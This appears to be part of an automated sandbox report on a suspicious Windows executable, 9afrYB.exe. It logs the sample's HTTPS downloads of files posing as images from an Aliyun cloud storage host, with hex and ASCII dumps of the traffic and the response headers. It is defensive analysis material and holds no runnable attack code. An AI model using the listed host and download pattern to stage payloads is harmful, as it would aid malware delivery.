                                                                                2025-01-10 01:27:51 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                                                                Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                                                2025-01-10 01:27:51 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                                                                Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                                                                2025-01-10 01:27:51 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                                                                Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                                                2025-01-10 01:27:51 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                                                                Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                                                                2025-01-10 01:27:51 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                                                                Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                                                                2025-01-10 01:27:51 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                                                                Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.549994118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:59 UTC115OUTGET /FOM-52.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:28:00 UTC547INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:28:00 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 5062442
                                                                                Connection: close
                                                                                x-oss-request-id: 678077A0A0BE373739194C99
                                                                                Accept-Ranges: bytes
                                                                                ETag: "70C21DA900796B279A09040B00953E40"
                                                                                Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 360383310743409046
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                                                                x-oss-server-time: 18
                                                                                2025-01-10 01:28:00 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                2025-01-10 01:28:00 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                                Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                                2025-01-10 01:28:00 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                                Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                                2025-01-10 01:28:00 UTC4096INData Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3
                                                                                Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
                                                                                2025-01-10 01:28:00 UTC4096INData Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d
                                                                                Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,|Zk!4ROn2 HPijFS~DcC69Kv m
                                                                                2025-01-10 01:28:00 UTC4096INData Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c
                                                                                Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
                                                                                2025-01-10 01:28:00 UTC4096INData Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71
                                                                                Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
                                                                                2025-01-10 01:28:00 UTC4096INData Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59
                                                                                Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<|=UyO}YzX<~+#~j8cZ2[*.K0`++@)GZr*g"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
                                                                                2025-01-10 01:28:00 UTC4096INData Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3
                                                                                Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
                                                                                2025-01-10 01:28:00 UTC4096INData Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3
                                                                                Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.549995118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:28:09 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:28:09 UTC546INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:28:09 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 366410
                                                                                Connection: close
                                                                                x-oss-request-id: 678077A966708539349055F2
                                                                                Accept-Ranges: bytes
                                                                                ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                                                                Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 5641369857548672686
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                                                                x-oss-server-time: 3
                                                                                2025-01-10 01:28:09 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                2025-01-10 01:28:09 UTC4096INData Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60
                                                                                Data Ascii: ```````````````````````````````````````````````````````````````
